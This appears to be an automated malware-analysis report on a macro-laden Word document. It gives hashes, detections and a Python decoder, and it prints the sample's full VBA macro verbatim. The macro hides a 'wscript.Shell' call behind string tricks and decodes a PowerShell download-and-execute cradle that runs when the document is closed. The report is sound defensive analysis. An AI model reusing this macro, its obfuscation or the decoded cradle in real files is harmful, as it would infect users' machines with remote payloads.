Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 dee5e465fc4959e0…

MALICIOUS

Office (OOXML)

Size: 57.6 KB
Created: 2017-11-29 23:43:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2020-02-04
MD5: 1a453d07485b6cb2c889d2676d4cf67e
SHA-1: bad636002e12d41fcc6e0f5ca38a5b8879d3d412
SHA-256: dee5e465fc4959e019cc6e781d4be278997c34a0465fa36825339e12068119c5
Risk score: 184

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a malicious OOXML (Word) document carrying a VBA project. The macro runs from `Document_Close`, so the payload fires when the user closes the document, not when it is opened. `appoggio` assembles the COM ProgID `wscript.Shell` at runtime (`StrReverse("tpircsw")` gives `wscript`, `Replace("SShell", "SS", ".S")` gives `.Shell`); `demenza` hands that string to `CreateObject` and calls `.Run` on the decoded command with a window style of `(4785 - 4785)`, i.e. 0, so the spawned process is hidden. The key calls (`demenza`, `appoggio`, `evaso`) are made through `Application.Run("name")` rather than directly, which together with the string assembly keeps `wscript.Shell` and a literal `CreateObject("WScript.Shell").Run(...)` pattern out of the source. The long argument built in `Document_Close` is neither hex nor base64 (the "base64-like blob" heuristic fires only because it is a long run of characters from the base64 alphabet; base64-decoding it yields nothing): it is a decimal digit string that `urlo` consumes two digits at a time, each pair being an index into the 54-character table in `evaso`. Decoding it yields a `powershell` command line of roughly 400 characters (so the `Len(...) < 4785` guard in `demenza` is satisfied) that downloads a file with `System.Net.WebClient.DownloadFile` into `%APPDATA%`, launches it with `Start-Process`, and then fetches and runs further script with `DownloadString` and `IEX`: a download-and-execute cradle for a second-stage payload. The ClamAV signature on `word/vbaProject.bin` is consistent with this; note that it does not fire on the decoded `macros.bas` text, so the detection keys on the compiled VBA/OLE container rather than on the source.
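The decoder below is an added example for this report, not code from the sample or from the analysis tool. It is a Python port of the sample's own `appoggio`, `urlo` and `evaso` routines, with the substitution table and the digit blob copied verbatim from the `macros.bas` listing in the Extracted artifacts section, so the argument that `demenza` would hand to `WScript.Shell.Run` can be recovered offline without executing the macro. `demenza_would_run` and `extract_urls` are helper names chosen here; they are not functions in the sample.

```python
"""Offline decoder for the string obfuscation used in macros.bas.

Added for this report: a Python port of the sample's appoggio()/urlo()/
evaso() routines, not code from the sample or from the analysis tool.
Running it recovers the command that demenza() passes to WScript.Shell.Run
without ever executing the macro.
"""
import re

# Substitution table, copied verbatim from evaso() in macros.bas.
# A two-digit index selects one character; index 53 is the last entry.
REPRIMERE = [
    "/", "E", "o", "P", "w", "-", "N", "\\", "k", ".", "u", "B", "O", "a",
    "C", "t", "v", "'", "(", "d", "r", "D", "p", "T", "=", ";", "+", "b",
    ",", "z", "s", "c", "I", "X", "h", " ", "l", "W", "$", "F", "x", "j",
    ")", "i", ":", "e", "q", "n", "A", "S", "?", "y", "m", "g",
]

# Digit blob copied verbatim from Document_Close() in macros.bas
# (split across lines here only for readability; the sample has it on one line).
FERALO = (
    "2202044520303445363635050602014043153505014045313511512213303035051402525213471935"
    "180645040512274145311535" "495130154552090645150937452714364345471542"
    "09210204473602131939433645" "181734151522440000"
    "0813305245474313083019474546044502020931025200" "494900"
    "1913161330080936295217" "2835" "38454716444803032148234835263517"
    "0720150339223209454045174225"
    "35491513201505032002314530303538454716444803032148234817"
    "07201503392232094540451725" "35180645040512274145311535"
    "495130154552090645150937452714364345471542"
    "092102044736021319491520434753" "181734151522440000"
    "0813305245474313083019474546044502020931025200" "300922342250431924"
    "191316133008" "174225" "35320133" "1818" "0645040512274145311535"
    "495130154552090645150937452714364345471542"
    "092102044736021319491520434753" "181734151522440000"
    "313413205231431643363145364527201347150931025200"
    "27133108102209223422" "174242"
)


def appoggio() -> str:
    """Port of appoggio(): rebuilds the COM ProgID at runtime so the literal
    'wscript.Shell' never appears in the VBA source."""
    return ("tpircsw"[::-1] + "SShell".replace("SS", ".S")).strip()


def evaso(larga: int) -> str:
    """Port of evaso(): table lookup. The VBA function returns "" when no
    entry matches, so an out-of-range pair decodes to nothing."""
    return REPRIMERE[larga] if 0 <= larga < len(REPRIMERE) else ""


def urlo(tulipano: str) -> str:
    """Port of urlo(): walk the digit string two characters at a time and
    treat each pair as a decimal index into the table. A trailing single
    digit is ignored, exactly as the VBA loop's UBound check does."""
    out = []
    for i in range(0, len(tulipano) - 1, 2):
        out.append(evaso(int(tulipano[i:i + 2])))
    return "".join(out)


def demenza_would_run(trifoglio: str) -> bool:
    """demenza() only calls .Run when the decoded string is shorter than
    4785 characters; its second Run argument (4785 - 4785 = 0) hides the
    window. Helper name chosen for this example."""
    return len(trifoglio) < 4785


def extract_urls(command: str) -> list:
    """Pull http(s) URLs out of the decoded command. These, not the XML
    namespace URIs in the document body, are the sample's network
    indicators. Helper name chosen for this example."""
    return re.findall(r"https?://[^\s'\"()]+", command)


if __name__ == "__main__":
    cmd = urlo(FERALO)
    print("ProgID  :", appoggio())
    print("Would run:", demenza_would_run(cmd))
    print("Command :", cmd)
    for url in extract_urls(cmd):
        print("URL     :", url)
```

Running the script prints the ProgID, the decoded `powershell` command line and the three `http://` URLs it carries. The `Application.Run("evaso", ...)` indirection in the VBA has no effect on the decode and is dropped; everything else is a line-for-line port, so for a related sample only the two constants need replacing. Do not paste the decoded command into a shell: it downloads and executes a binary.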

Heuristics (5)

  • ClamAV: Doc.Malware.Valyria-8008733-0 [critical; CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Malware.Valyria-8008733-0
  • VBA project inside OOXML [medium; OOXML_VBA; 1 related finding]
    Document contains a VBA project (VBA macros present)
  • CreateObject call [high; OLE_VBA_CREATEOBJ]
    CreateObject call
  • Suspicious extracted artifact [info; EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info; EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL listed here is an Office Open XML or Microsoft Office XML namespace identifier declared in the document's XML parts (the `w:`, `mc:`, `wp:`, `wps:` and similar prefixes); they are schema names that Word never contacts, not network indicators. The sample's real network indicators are inside the encoded macro argument, which the URL extractor cannot see.
    • http://schemas.openxmlformats.org/markup-compatibility/2006 | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2010/main | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas | In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 2844 bytes
SHA-256: 773e28f4256c2f5c7aa781bc49b7b4305e87b630a080cd3a5632057fb48cabb1
Detection
ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob)
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function mondina(creato, lacuna)

  If creato >= 0 And lacuna >= 0 Then
    mondina = creato + lacuna
  End If
End Function

Function appoggio()
  appoggio = Trim(StrReverse("tpircsw") & Replace("SShell", "SS", ".S"))
End Function


Public Function demenza(trifoglio As String)
  If Len(trifoglio) < 4785 Then
    Call CreateObject(Application.Run("appoggio")).Run(trifoglio, (4785 - 4785))
  End If
End Function

Sub Document_Close()
 feralo = urlo("2202044520303445363635050602014043153505014045313511512213303035051402525213471935180645040512274145311535495130154552090645150937452714364345471542092102044736021319394336451817341515224400000813305245474313083019474546044502020931025200494900191316133008093629521728353845471644480303214823483526351707201503392232094540451742253549151320150503200231453030353845471644480303214823481707201503392232094540451725351806450405122741453115354951301545520906451509374527143643454715420921020447360213194915204347531817341515224400000813305245474313083019474546044502020931025200300922342250431924191316133008174225353201331818064504051227414531153549513015455209064515093745271436434547154209210204473602131949152043475318173415152244000031341320523143164336314536452720134715093102520027133108102209223422174242")
 Call Application.Run("demenza", feralo)
End Sub

Function urlo(tulipano)
  randagio = stridulo(tulipano)
  esortato = Trim(vbNullString) & vbNullString
  gemello = Len("c")

  For bruno = 0 To Len(tulipano)
    If (mondina(bruno, gemello)) <= UBound(randagio) Then
    mimosa = randagio(mondina(bruno, gemello))
    isolato = randagio(bruno)
    lavoro = CInt(isolato + mimosa)
    esortato = esortato & Application.Run("evaso", lavoro)
    bruno = mondina(bruno, gemello)
    End If
  Next
  
  urlo = esortato
End Function


Function stridulo(foderato)
    unicodeStr = StrConv(foderato, vbUnicode)
    stridulo = Split(Left(unicodeStr, Len(unicodeStr) - 1), vbNullChar)
End Function




Public Function evaso(ByVal larga As Integer) As String
 reprimere = Array("/", "E", "o", "P", "w", "-", "N", "\", "k", ".", "u", "B", "O", "a", "C", "t", "v", "'", "(", "d", "r", "D", "p", "T", "=", ";", "+", "b", ",", "z", "s", "c", "I", "X", "h", " ", "l", "W", "$", "F", "x", "j", ")", "i", ":", "e", "q", "n", "A", "S", "?", "y", "m", "g")
 realNrs = reprimere
 Dim bruno As Integer
 
 For bruno = 0 To UBound(realNrs)
   If bruno = larga Then
    evaso = Replace(Replace(realNrs(bruno), "[", ""), "]", "")
   End If
 Next
 
End Function
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 13312 bytes
SHA-256: 8a996f167127452644443f481dc1d4bc60e9d5cb32b67667cd312de737291f90
Detection
ClamAV: Doc.Malware.Valyria-8008733-0
Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob)